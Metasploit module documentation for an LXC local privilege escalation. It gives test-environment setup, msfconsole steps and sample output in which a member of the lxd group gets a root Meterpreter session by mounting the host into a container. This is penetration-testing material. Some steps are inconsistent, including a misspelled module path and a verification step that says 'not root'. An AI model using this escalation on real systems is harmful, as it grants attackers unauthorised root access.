rapid7/metasploit-framework
# New Module LXC local privilege escalation

This module is based off the Docker daemon local priv esc but adapted for LXC. This gives a root shell to any user with access to use the lxc command such as those within the `lxd` group.

## Verification

### Testing environment
- Install LXC
- Add a non-root user to the `lxd` group
- Download an image so that there is one available locally
- Obtain a shell on the host system as this non-root user
- Use this exploit to obtain a root shell

### Verification Steps

1. Gain shell as user in the lxd group via any method
2. `use exploit/linux/local/lxc_privilege_escation`
3. `set SESSION [session]`
4. `set PAYLOAD [payload]`
5. `set LHOST [lhost]`
6. `set LPORT [lport]`
7. `exploit`
8. Verify user is not root on the host machine

Note: bind shells are unlikely to work due to missing port mappings from container to host.

## Scenarios

Privilege escalation starting with a meterpreter shell
```
msf5 exploit(multi/handler) > use exploit/linux/local/lxc_privilege_escalation
msf5 exploit(linux/local/lxc_privilege_escalation) > set session 3
session => 3
msf5 exploit(linux/local/lxc_privilege_escalation) > run

[+] LXC is accessible, and there is at least one local image we can use to create a container
[*] Using base image 306c66cc1a40
[*] Writing payload executable to '/tmp/nkoGWxrsq'
[!] Creating container named fPjLQFNNC, remember to delete this after exploitation
[!] Using: lxc stop fPjLQFNNC && lxc delete fPjLQFNNC
[*] Executing script to create and run LXC container
[*] Creating container
[*] Adding mount to container
[*] Starting container
[*] Executing payload inside container

[*] Started bind TCP handler against 192.168.0.231:4444
[*] Sending stage (3012516 bytes) to 192.168.0.231
[*] Meterpreter session 4 opened (0.0.0.0:0 -> 192.168.0.231:4444) at 2020-07-19 14:50:51 +0100
```
